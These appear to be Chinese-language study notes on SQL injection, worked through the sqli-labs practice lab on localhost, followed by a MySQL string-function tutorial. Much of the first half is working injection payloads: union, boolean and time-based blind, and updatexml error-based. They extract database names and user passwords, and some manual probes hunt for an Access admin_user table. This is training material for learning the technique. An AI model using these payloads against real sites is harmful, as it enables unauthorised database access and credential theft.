安全笔记 | XR-SEC

开始学习

查库：

1	select schema_name from information_schema.schemata

查表：

1	select table_name from information_schema.tables where table_schema='security'

查列：

1	select column_name from information_schema.columns where table_name='users'

查字段：

1	select username,password from security.users

sqli-lib实践

less-01:
SELECT * FROM users WHERE id='1' LIMIT 0,1;
select SELECT
limit 0,1; 其中第一位是从第几个开始，比如0代表从第一个开始，而第二位的1代表的就是显示多少个数据。

SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1
--+ --  #
or and
A and B   True
A or B  True True
id=1
SELECT * FROM users WHERE id='1''
less-01
数据中存在3列。


system_user()
user()
current_user()
database()
version()
@@datadir
@@version_compile_os

group_concat()
concat_ws('~',A,B)
A~B


information_schema,challenges,mysql,performance_schema,security,test
security
emails,referers,uagents,users
id,username,password


group_concat(concat_ws(0x7e,username,password)) from security.users

concat_ws(0x7e,username,password)    # admin~password,admin1~pass，

'1'
1
('1')

select ascii(substr((select database()),1,1));
select database()   security
select ascii(substr(security),1,1));
select ascii('s')
115

burpsuite 使用： 代理
security
crow_1
if length(select database()) =8;

http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
http://127.0.0.1/sqli/Less-5/?id=1’ and  ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+

ascii(substr((select database()),1,1))> 156
security
二分法
1，156
100

http://127.0.0.1/sqli/Less-5/?id=1'
and
 ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10
 99
 --+

select if()
select database()
substr((select database()),1,1)
ascii(substr((select database()),1,1))
select if(ascii(substr((select database()),1,1)) > 10, 2,3);

sqli-labs less01-less10
mysql 查询语句：

查库： select schema_name from information_schema.schemata;
查表： select table_name from information_schema.tables where table_schema='security';
查列： select column_name from information_schema.columns where table_name='users';
查字段： select username,password from security.users;

less-11

select 1=1 and 1=2;
select 1=1 or 1=2;
uname=n'  union select 1, schema_name from information_schema.schemata  limit 1,1#&passwd=admin&submit=Submit
uname=n'  union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit
security
uname=n'  union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit
总结：
less-1   get
less-11  post
(1)

'
')
'))
"
")
"))
select * from users where user_id = '1';
select * from users where user_id = '1111 ' or 1=1 #
select database();
  group_concat(concat(0x7e,username,password)) from security.users
  ~
  username~password

less-13
select length(database());
if()
长度：if(length(database())>1,1,sleep(5));  数据库字符长度是8
left(database(),1)='a'

uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
inf
A-Z
0_9
_


 less-14
 uname=admin " or length(database())='8'#&passwd=admin&submit=Submit
 A or B
 A and B

uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit

less-15
uname=admin&passwd=a' or length(database())='8'#&submit=Submit

less-16
13   ('ain')
14   "admin"
15    'ain'
16     ("admin")
uname=admin&passwd=admin") and 1=2#&submit=Submit

less-17
uname=admin&passwd=afafa'#&submit=Submit
select updatexml(1,concat(0x7e,(database())),1);
select updatexml(1,concat(0x7e,(构造语句)),1);
查库： select schema_name from information_schema.schemata;
查表： select table_name from information_schema.tables where table_schema='security';
查列： select column_name from information_schema.columns where table_name='users';
查字段： select username,password from security.users;
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)

less-18
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin')
' or updatexml(1,concat(0x7e,()),1);
select  updatexml(1,concat(0x7e,(database())),1);
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
' or updatexml(1,concat(0x7e,(database())),1), '','')#
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')#

16进制

1	0x + Hex Encode

手工注入

2%'and(select count(*)from mssysaccessobjects)>0 and '%'=' //返回正常，access數據庫
2%'and(select count(*)from admin_user)>0 and '%'=' //返回正常，存在admin_user表
2%'and(select count(username)from admin_user)>0 and '%'=' //返回正常，存在username字段
2%'and(select count(password)from admin_user)>0 and '%'=' //返回正常，存在password字段
2%'and(select top 1 len(admin)from admin_user)>4 and '%'=' //返回正常，username長度大於4

Mysql中concat()、concat_ws()和 group_concat()的用法

一、CONCAT（）函数

CONCAT（）函数用于将多个字符串连接成一个字符串。
使用数据表Info作为示例，其中SELECT id,name FROM info LIMIT 1;的返回结果为

+----+--------+
| id | name  |
+----+--------+
| 1 | BioCyc |
+----+--------+

1、语法及使用特点：

CONCAT(str1,str2,…)
返回结果为连接参数产生的字符串。如有任何一个参数为NULL ，则返回值为 NULL。可以有一个或多个参数。

2、使用示例：

SELECT CONCAT(id, ‘，’, name) AS con FROM info LIMIT 1; $ 返回结果为
+----------+
| con   |
+----------+
| 1,BioCyc |
+----------+

SELECT CONCAT(‘My’, NULL, ‘QL’); # 返回结果为
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL           |
+--------------------------+

3、如何指定参数之间的分隔符

使用函数CONCAT_WS（）。使用语法为：CONCAT_WS(separator,str1,str2,…)
CONCAT_WS() 代表 CONCAT With Separator ，是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串，也可以是其它参数。如果分隔符为 NULL，则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的 NULL）。

如SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1;返回结果为
+----------+
| con_ws  |
+----------+
| 1_BioCyc |
+----------+

SELECT CONCAT_WS(',','First name',NULL,'Last Name');返回结果为
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name             |
+----------------------------------------------+

二、GROUP_CONCAT（）函数

GROUP_CONCAT函数返回一个字符串结果，该结果由分组中的值连接组合而成。
使用表info作为示例，其中语句

SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764');的返回结果为
+----------+----+--------------------------+
| locus  | id | journal         |
+----------+----+--------------------------+
| AB086827 | 1 | Unpublished       |
| AB086827 | 2 | Submitted (20-JUN-2002) |
| AF040764 | 23 | Unpublished       |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+--------------------------+

1、使用语法及特点：

1
2
3

GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])

在 MySQL 中，你可以得到表达式结合体的连结值。通过使用 DISTINCT 可以排除重复值。如果希望对结果中的值进行排序，可以使用 ORDER BY 子句。
SEPARATOR 是一个字符串值，它被用于插入到结果值中。缺省为一个逗号 (",")，可以通过指定 SEPARATOR "" 完全地移除这个分隔符。
可以通过变量 group_concat_max_len 设置一个最大的长度。在运行时执行的句法如下：
SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;
如果最大长度被设置，结果值被剪切到这个最大长度。如果分组的字符过长，可以对系统参数进行设置：
SET @@global.group_concat_max_len=40000;

2、使用示例：

语句 SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; 的返回结果为

+----------+------------------+
| locus  | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2       |
| AF040764 | 23,24      |
+----------+------------------+

语句 SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;的返回结果为

+----------+----------------------------------------------------------+
| locus  | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1                           |
| AF040764 | 24_23                          |
+----------+----------------------------------------------------------+

语句SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;的返回结果为

+----------+--------------------------------------------------------------------------+
| locus  | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished                |
| AF040764 | 24, Submitted (31-DEC-1997) . 23, Unpublished              |
+----------+--------------------------------------------------------------------------

XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way